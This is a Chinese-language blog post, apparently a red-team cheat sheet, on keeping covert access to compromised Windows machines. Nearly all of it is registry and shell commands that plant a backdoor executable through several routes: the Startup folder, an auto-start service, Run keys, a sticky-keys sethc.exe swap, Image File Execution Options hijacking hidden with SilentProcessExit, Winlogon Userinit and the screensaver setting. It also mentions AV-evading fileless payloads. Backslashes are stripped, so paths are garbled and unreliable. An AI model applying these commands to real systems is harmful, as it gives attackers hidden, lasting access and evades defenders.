您现在的位置是:首页 >学无止境 >【权限维持】Windows&自启动&映像劫持&粘滞键&辅助屏保后门&WinLogon网站首页学无止境

【权限维持】Windows&自启动&映像劫持&粘滞键&辅助屏保后门&WinLogon

今天是 几 号 2023-05-19 12:00:02
简介【权限维持】Windows&自启动&映像劫持&粘滞键&辅助屏保后门&WinLogon

文章目录

权限维持-域环境&单机版-自启动

1、自启动路径加载

C:UsersAdministratorAppDataRoamingMicrosoftWindowsStart MenuProgramsStartup

将后门放置该目录,服务器重启即上线
2、自启动服务加载

sc create ServiceTest binPath= C:shell.exe  start= auto
sc delete ServiceTest

3、自启动注册表加载
-当前用户键值

HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun

-服务器键值(需要管理员权限)

HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun

-添加启动项

REG ADD "HKCUSOFTWAREMicrosoftWindowsCurrentVersionRun" /V "backdoor" /t REG_SZ /F /D "C:shell.exe"

在这里插入图片描述
4、计划计时任务
参考前面横向移动

权限维持-域环境&单机版-粘滞键

远程连接时,连按五下shift键可以打开粘滞键
在这里插入图片描述

系统自带的辅助功能进行替换执行,放大镜,旁白,屏幕键盘等均可。
粘滞键位置:

c:windowssystem32sethc.exe
move sethc.exe sethc1.exe
copy cmd.exe sethc.exe		本质还是进行程序替换

权限维持-域环境&单机版-映像劫持

测试:执行notepad成cmd

REG ADD "HKLMSOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Options
otepad.exe" /v debugger /t REG_SZ /d "C:WindowsSystem32cmd.exe /c calc"

在这里插入图片描述

配合GlobalFlag隐藏:执行正常关闭后触发

reg add "HKLMSOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Options
otepad.exe" /v GlobalFlag /t REG_DWORD /d 512
reg add "HKLMSOFTWAREMicrosoftWindows NTCurrentVersionSilentProcessExit
otepad.exe" /v ReportingMode /t REG_DWORD /d 1
reg add "HKLMSOFTWAREMicrosoftWindows NTCurrentVersionSilentProcessExit
otepad.exe" /v MonitorProcess /d "C:shell.exe"

33::18

权限维持-域环境&单机版-屏保&登录

1、WinLogon配合无文件落地上线(切换用户登录就会上线)

REG ADD "HKLMSOFTWAREMicrosoftWindows NTCurrentVersionWinlogon" /V "Userinit" /t REG_SZ /F /D "userinit,C:shell.exe"

在这里插入图片描述
配合powershell payload(需免杀)实现无文件落地
在这里插入图片描述

2、屏幕保护生效后执行后门

reg add "HKEY_CURRENT_USERControl PanelDesktop" /v SCRNSAVE.EXE /t REG_SZ /d "C:shell.exe" /f
风语者!平时喜欢研究各种技术,目前在从事后端开发工作,热爱生活、热爱工作。

站长推荐